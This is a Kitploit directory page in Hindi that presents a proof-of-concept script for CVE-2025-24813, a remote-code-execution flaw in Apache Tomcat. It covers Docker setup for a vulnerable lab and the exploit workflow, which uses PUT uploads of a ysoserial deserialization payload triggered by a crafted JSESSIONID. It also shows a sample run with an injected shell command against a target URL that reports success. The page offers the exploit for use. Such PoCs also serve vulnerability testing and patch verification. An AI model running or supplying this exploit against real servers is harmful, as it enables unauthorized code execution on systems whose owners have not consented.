Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813 — Apache Tomcat में CVE-2025-24813 भेद्यता के लिए Proof of Concept (PoC) स्क्रिप्ट | Kitploit
उपकरण/GitHubGitHub/hakankarabacak/cve-2025-24813
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Apache Tomcat में CVE-2025-24813 भेद्यता के लिए Proof of Concept (PoC) स्क्रिप्ट

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813

CVE-2025-24813 के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट, Apache Tomcat में एक भेद्यता।

यह स्क्रिप्ट संबंधित लिंक के आधार पर संशोधित की गई है और मेरी आवश्यकताओं के अनुरूप बनाई गई है।

कमजोर Tomcat वातावरण सेटअप करें

यह आधिकारिक Tomcat 9.0.90 इमेज पर आधारित वातावरण प्रदान करता है। यह सर्वर की रीड-ओनली प्रतिबंध को हटाता है और इसे सेशन डेटा को डिस्क पर सहेजने के लिए कॉन्फ़िगर करता है। फिर, यह ROOT.war फ़ाइल को Tomcat की webapps/ डायरेक्टरी में कॉपी करके स्वचालित रूप से एप्लिकेशन डिप्लॉय करता है।

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

कार्यप्रवाह

  1. एक check.txt फ़ाइल जिसमें Content-Range हेडर है, यह सत्यापित करने के लिए रखी जाती है कि सर्वर PUT अनुरोध स्वीकार कर रहा है।
  2. यदि सर्वर लिखने योग्य है, तो वांछित कमांड के लिए ysoserial का उपयोग करके एक पेलोड जनरेट किया जाता है।
  3. दुर्भावनापूर्ण सेशन फ़ाइल को PUT अनुरोध के माध्यम से डायरेक्टरी में अपलोड किया जाता है, इसे सेशन ID और फ़ाइलनाम से जोड़ा जाता है।
  4. एक कस्टम JSESSIONID के साथ GET अनुरोध भेजा जाता है, जो डिसीरियलाइज़ेशन को ट्रिगर करता है।
  • अस्थायी पेलोड फ़ाइल को डायरेक्टरी से हटा दिया जाता है।
  • उपयोग

    root@kitploit:~
    $ python3 cve_2025_24813.py
    
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
     
                     --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---
    
    Enter target URL (e.g., http://target.com:8080): http://target.com:8080
    Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
    Enter path to ysoserial.jar (default: ysoserial.jar): 
    Enter ysoserial gadget chain (default: CommonsCollections6): 
    [*] Session ID: hk1337
    [+] Server is writable via PUT: http://target.com:8080/check.txt
    [*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
    [+] Payload generated successfully: payload.ser
    [+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
    [+] Exploit succeeded! Server returned 500 after deserialization.
    [+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
    [+] Temporary file removed: payload.ser
    

    PoC

    https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

    टूल डाउनलोड करें